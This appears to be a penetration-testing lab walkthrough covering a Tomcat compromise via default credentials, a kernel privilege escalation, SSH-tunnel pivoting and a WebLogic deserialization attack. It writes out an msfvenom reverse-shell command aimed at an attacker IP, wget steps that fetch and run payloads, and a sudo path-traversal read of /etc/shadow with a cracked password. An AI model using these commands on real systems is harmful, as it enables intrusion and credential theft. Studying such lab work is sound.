Lab:
Reconnaissance
Let’s start the fun by doing an nmap scan on our Victim machine 192.168.1.8
we found multiple services running including apache, netbios ,nfs share and Tomcat. When ever i find tomcat , i always think of Tomcat Default Credential and uploading war file exploit.
Exploit Scenario
first i tried to visit http://192.168.1.8:8080/manager and try tomcat:tomcat credentials and i could connect to the manager interface
next i created a war file payload using msfvenom to get a reverse shell that connects to my attacker machine 192.168.1.13 on port 4443 on the server and named the file webshell.war
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.13 LPORT=4443 -f war > webshell.war
Next we have to get the name of the jsp file to execute, we can use jar -tf webshell.war
next we have to listen on port 4443 and then execute
wget 192.168.1.8:8080/webshell/umrvzbycqupfmbi.jsp or visit the url from our browser.
and we will get a shell on our first victim with user tomcat7
Privilege Escalation
once i get a shell and want to do privilege escalation i always check what commands i can execute with sudo as a root.
unfortunately i can’t execute any commands using sudo. let’s try to check the version using uname -v
Doing some Google foo you can find that it’s vulnerable to privilege escalation exploit so we can get exploit from internet 39166.c
first i have to get the exploit code to the victim machine so i ran a python http server using command python -m SimpleHTTPServer which will run on port 8000, and the run wget from our reverse shell connection to get the code and put it inside /tmp
finally we compile the code and run the exploit and voila we got a root shell shell.
Pivoting
first let’s try to run ifconfig to check if our victim is connected to another network.
we can find that it has another IP 192.168.152.143, now we have to find a way to use this machine as a pivot and connect to the other network, reading an article from how Hacking got hacked i remembered a technique to do this using ssh dynamic tunneling and proxychains
so first i started the ssh daemon as from nmap results there was no ssh running and also i changed the root password in order to be able to establish an ssh session.
next i did the below command which create what is called a dynamic tunnel using -D option.
ssh -D 9090 root@192.168.1.8
Once the ssh session is started the tunnel is up on port 9090. so next let’s configure proxychains to use this port
and we can run proxychains before any command while we are trying to connect to any ip in 192.168.152.0/24 subnet.
next we can run our nmap ping sweep using proxychains , so proxychains will utilize the ssh tunnel created on port 9090 to reach the 192.168.152.0/24 subnet. so by executing sudo proxychains nmap -Pn 192.168.152.0/24
by excluding 192.168.152.1 and 192.167.152.254(VM Specific IP’s) we can conclude that our next victim will be 192.168.152.141
let’s nmap this host using proxychains
we found two ports open, first i wanted to browse to port 7001 using my browser, unfortunately proxychains can’t do that. so the solution was to create a Local SSH Tunnel to be able to connect to port 7001, so doing ssh -L 7000:192.168.152.141:7001 root@192.168.1.8 means that we can connect to localhost 7000 and the traffic will be tunneled to our victim 192.168.152.141 port 7001.
next from browser we can visit http://localhost:7000 and we can find it’s oracle weblogic.
Weblogic is an oracle application Middleware which is usually used to connect applications with each others using servlets and other techniques.
doing some google foo we can find that it’s vulnerable to java deserialization Exploit which can lead to RCE.
i found many topics on how to exploit java deserialization vulnerabilities in oracle weblogic including this.
The only challenge was how to get a reverse shell from the other victim 192.168.152.141 while it’s not in our network.
again we can use SSH Tunneling but this time Remote SSH Tunneling.
we need a remote tunnel which will be used to connect back to our Linux Mint Attacker Machine 192.168.1.13 on port 4444
so first we created our exploit bash reverseshell script, the below script when executed will make a reverse shell connection to our first victim 192.168.152.143 on port 8888
so we have to create a remote tunnel that forwards all requests to 8888 to 4444 on our machine. ssh -R 0.0.0.0:8888:192.168.1.13:4444 root@192.168.1.8
this command once ssh connection is established between attacker machine and 1st victim machine will create a listener on the 1st Victim machine on port 8888 , any connection to this port will get forwarded to attacker machine on port 4444
but now how can we get this bash script to the vulnerable weblogic server. the solution is to host it on our python SimpleHTTPServer on port 8000 and create another remote tunnel to my webserver using
ssh -R 0.0.0.0:8001:192.168.1.13:8000 root@192.168.1.8
so let’s now exploit the Weblogic java deserialization vulnerability.
let’s use the exploit code from This blog
python weblogic.py [Victim Machine and port] [location of ysoserial tool which generate java payloads] [command to execute]
python weblogic.py localhost 7000 ../ysoserial-0.0.2-all.jar ‘wget http://192.168.152.143:8001/BashReverseShell.sh’
so connecting to 192.168.152.143:8001 will basically connect to our machine on port 8000 which is the python HTTP Webserver
and from webserver python logs we can find that a GET request is there to get the bash file which means that our exploit is succeeding , the only thing missing is to execute the script.
so now let’s run the exploit code , which will get a reverse connection to 192.168.152.141:8888 which will be tunneled to 192.168.1.13:4444 using the command
ssh -R 0.0.0.0:8888:192.168.1.13:4444 root@192.168.1.8
and also we have to create our listener on port 4444
finally when we executes python weblogic.py localhost 7000 ../ysoserial-0.0.2-all.jar ‘sh BashReverseShell.sh’ and we will get ourselves a shell.
Miss configuration to root
as always when get a shell i try to find which commands i can run as root using sudo.
i can find that i can run /bin/cat /root/backup/*
great that is a miss configuration which we can take advantage of. we can use sudo to cat /root/backup and then go Two directories back and basically cat any file we want in root.
so let’s cat the shadow file using
sudo /bin/cat /root/backup../../etc/shadow
and finally I cracked the root password using John the ripper which was mario101
Thanks hope you enjoyed reading